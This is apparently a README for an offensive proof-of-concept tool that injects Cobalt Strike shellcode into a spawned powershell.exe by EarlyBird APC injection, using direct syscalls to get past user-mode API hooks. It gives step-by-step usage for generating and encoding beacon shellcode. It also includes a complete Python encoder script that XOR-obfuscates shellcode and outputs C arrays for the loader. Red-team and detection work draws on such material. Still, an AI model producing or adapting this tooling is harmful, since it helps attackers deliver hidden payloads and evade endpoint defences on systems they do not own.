EarlyBird: a PoC of the EarlyBird APC injection technique with direct syscalls against powershell.exe

Overview

Injects Cobalt Strike shellcode into a freshly spawned powershell.exe using the EarlyBird technique: the target process is created suspended, the shellcode is written into it, an APC pointing at the shellcode is queued on the main thread, and the thread is resumed so the APC runs before the process entry point. The memory and thread operations are performed through direct syscalls rather than the exported Win32/ntdll wrappers, so user-mode API hooks placed in the injector's own process do not see them.


USAGE:

  • First prepare a Malleable C2 profile for your listener.
  • Generate x64 HTTPS shellcode from Cobalt Strike in C format.
  • Paste it into encoder.py and run the script with Python 2.
  • Copy the encoded output into main.cpp in place of the existing shellcode array.
  • If you changed the encoding key in encoder.py, change it in main.cpp as well; the loader decodes with the compiled-in key, so a mismatch yields garbage bytes and a crash in the target rather than a beacon.
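The encoder step above is not shown on the page, so the following is an added example, not the repository's encoder.py: a Python 3 script that takes C-format shellcode as produced by Cobalt Strike, XOR-encodes it with a repeating key, and emits the encoded bytes plus the key as C arrays that can be pasted into main.cpp. The repeating-key XOR scheme, the key value `Kn0wnK3y`, the array names `key` and `buf`, and the sample input bytes are all assumptions (the sample is constructed filler in the right format, not a real payload).

```python
"""
Added example (not the repository's encoder.py): Python 3 rewrite of the
"paste C-format shellcode, encode it, paste the output into main.cpp" step.
The XOR-with-repeating-key scheme and the key value are assumptions; the
original encoder.py is Python 2 and its scheme is not shown on the page.
"""
import re

# Constructed sample in the Cobalt Strike / msfvenom "c" output format.
# These bytes are arbitrary filler to show the format, not a real payload.
SAMPLE_C_SHELLCODE = r'''
/* length: 12 bytes */
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8"
"\xc0\x00\x00\x00\x41\x51";
'''

# Assumed key; it must match the key compiled into main.cpp.
DEFAULT_KEY = b"Kn0wnK3y"


def parse_c_shellcode(text: str) -> bytes:
    """Extract the raw bytes from every \\x.. escape in the C string literals."""
    hex_bytes = re.findall(r'\\x([0-9a-fA-F]{2})', text)
    if not hex_bytes:
        raise ValueError("no \\x escapes found; is this C-format shellcode?")
    return bytes(int(h, 16) for h in hex_bytes)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; applying it twice restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def to_c_array(name: str, data: bytes, per_line: int = 12) -> str:
    """Emit an unsigned char array definition that can be pasted into main.cpp."""
    lines = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        lines.append("    " + ", ".join(f"0x{b:02x}" for b in chunk) + ",")
    body = "\n".join(lines)
    return f"unsigned char {name}[{len(data)}] = {{\n{body}\n}};"


def encode_for_main_cpp(c_text: str, key: bytes = DEFAULT_KEY) -> str:
    """Parse C-format shellcode, XOR it, and return the key and buffer as C arrays."""
    shellcode = parse_c_shellcode(c_text)
    encoded = xor_bytes(shellcode, key)
    # Verify the loader-side decode restores the original before shipping it.
    if xor_bytes(encoded, key) != shellcode:
        raise RuntimeError("round-trip check failed")
    return to_c_array("key", key) + "\n\n" + to_c_array("buf", encoded)


if __name__ == "__main__":
    print(encode_for_main_cpp(SAMPLE_C_SHELLCODE))
```

Run the script against the shellcode file (or replace `SAMPLE_C_SHELLCODE` with the generated output) and paste both arrays into main.cpp; the loader's decode loop must use the same key and the same XOR-by-index scheme, which is why the key is emitted next to the buffer rather than kept only in the encoder.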

DEMO:

DEMO.mp4

Based on:

